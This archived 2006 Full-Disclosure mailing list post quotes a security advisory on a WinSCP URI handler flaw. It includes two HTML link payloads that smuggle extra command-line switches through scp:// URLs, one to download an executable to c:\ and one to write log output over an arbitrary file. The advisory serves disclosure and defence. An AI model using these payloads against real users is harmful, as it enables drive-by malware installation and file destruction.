lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun Jun 11 14:37:11 2006 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Subject: WinSCP - URI Handler Command Switch Parsing Your e-mail has the following Date field: Fri, 10 Mar 2006 21:24:12 +0100 My e-mail client says 'Sent: 10.3.2006 22:24:12' because of this. Archive puts it to Jun 11th, however: http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046810.html - Juha-Matti Jelmer Kuperus <jkuperus@...net.nl> kirjoitti: > > WinSCP - URI Handler Command Switch Parsing > > About winscp : > > WinSCP is an open source freeware SFTP client for Windows using SSH. > Legacy SCP protocol is also supported. Its main function is safe copying > of files between a local and a remote computer. > > Versions affected : > > It was tested on WinSCP 3.8.1 , previous versions may or may not be > affected > > Description : > > During a typical installation of winscp several URI handlers are > installed. (scp:// sftp://) It is possible to include additional command > line switches to be passed to winscp > > Some of these switches may initiate a file transfer, sending a > specified file to an arbitrary ftp. or they may download executables to > a location on a pc where they would be executed. eg. the startup folder > > If you create an html page with these contents > > <a href="scp://user:password@...t:22/%22%20/console%20/command%20%22lcd% > 20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a> > > And click on the link it would automatically download malware.exe to a > c:\ (asuming the host is in the cache otherwise user interaction is > required) > > clicking on > > <a href="scp://jelmer@....0.0.1:22/%22%20%22/log=c:%5csomefile% > 22"log</a> > > would append log output to c:\somefile possibly rendering the file > unusable in the process. Note that this also works when the host is not > in the cache > > Vendor status : > > Martin Prikryl was notified June 04, 2006, He will "think about a > solution" > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists